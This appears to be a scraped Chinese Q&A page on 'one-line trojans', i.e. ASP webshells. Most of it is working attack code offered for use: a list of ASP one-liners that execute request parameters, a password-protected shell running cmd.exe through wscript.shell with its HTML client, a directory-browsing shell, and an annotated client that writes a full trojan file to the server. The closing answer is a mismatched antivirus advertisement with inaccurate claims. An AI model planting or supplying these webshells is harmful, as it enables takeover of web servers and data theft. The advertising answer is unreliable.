数据库一句话木马病毒(一句话木马攻击)
本文目录一览:
一句话木马中的大马和小马的作用各是什么?
小马体积小,容易隐藏,隐蔽性强,最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能。
不过中国菜刀留的一句话功能不逊大马的功能。
大马体积比较大 一般50K以上。功能也多,一般都包括提权命令,磁盘管理,数据库连接借口,执行命令甚至有些以具备自带提权功能和压缩,解压缩网站程序的功能。这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类程序。
一句话木马
ASP一句话木马大全!
%eval request("MH")%
%execute request("MH")%
%execute(request("MH"))%
%If Request("MH")"" Then Execute(Request("MH"))%
%if request ("MH")""then session("MH")=request("MH"):end if:if session("MH")"" then execute session("MH")%
SCRIPT language=VBScript runat="server"execute request("MH")/SCRIPT
%@ Page Language="Jscript"%
%eval(Request.Item["MH"],"unsafe");%
1 asp一句话木马
一句话木马 服务器端
带验证:
——————————————cmd.asp————————————————
%
if request("authkey")="pic16f873a" then
%
textarea readonly cols=80 rows=25
%response.write server.createobject("wscript.shell").exec("cmd.exe /c "request("cmd")).stdout.readall%
/textarea
%
end if
%
带验证 客户端
——————————————cmd.html————————————————
HTML
HEAD
meta http-equiv="Content-Type" content="text/html; charset=gbk"
/HEAD
div align=center
FORM method=post name=frm target=_blank
Host:input type=text name=act size=65 value="http://"
br
br
Cmd :input type=text name=cmd size=65 value="cmd"
br
br
input type=hidden name=authkey value="pic16f873a"
Input name=Send
onclick="Javascipt:frm.action=document.frm.act.value;
frm.submit();"
type=button value="Send Command"
/FORM
/div
目录浏览
服务器端
_________________________________________
%
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")
set shell=server.createobject("shell.application")
set dir1=shell.namespace(szPara)
set diritems=dir1.items
for each iii in diritems
response.write iii.path "font color=blue[" iii.size "]/fontbr"
next
end if
%
_________________________________________
客户端
__________________________________________
HTML
HEAD
meta http-equiv="Content-Type" content="text/html; charset=gbk"
/HEAD
div align=center
FORM method=post name=frm target=_blank
Host:input type=text name=act size=65 value="http://"
br
br
Path:input type=text name=path size=65 value="C:\"
br
br
input type=hidden name=authkey value="pic16f873a"
Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command"
/FORM
/div
一句话木马客户端源文件:
里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了
***********************************************************
form action= method=post
//"action="后面是需要修改的以asp命名的数据库的提交地址
//这个标签的意思是建立一个表单 以post方式提交给连接处理
textarea name=value cols=120 rows=10 width=45
//这里的value值根据服务端%execute request("value")%中value而设定
//可以自行修改成%execute request("p")%相应这里的value值也必须改为p
set lP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应
lP.SaveToFile server.mappath("wei.asp"),2
//将木马内容以覆盖文件的方式写入wei.asp
//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登 陆界面
/textarea
//这段程序的功能:利用插入到数据库文件的%execute request("value")%这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了
textarea name=joeving cols=120 rows=10 width=45添入生成木马的内容/textareaBRcenterbr
//这段标签是你用来添加木马内容用的
input type=submit value=提交
/form
***********************************************************
//程序的主要框架是
form
textarea/textarea//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示
textarea/textarea//添加木马内容用的
/form
其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~呵呵
希望对你能有所帮助。
一句话木马有什么样的危害?危害有多大?
您好:
一句话木马病毒一般是损坏系统文件为主的,如果您的电脑中了一句话木马病毒的话,建议您使用腾讯电脑管家的闪电杀毒功能对您的电脑杀毒,腾讯电脑管家是采用“4+1”核“芯”杀毒引擎的专业杀毒软件,杀毒能力很强大,是完全可以帮助您查杀干净电脑中的病毒的,您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载
腾讯电脑管家企业平台:
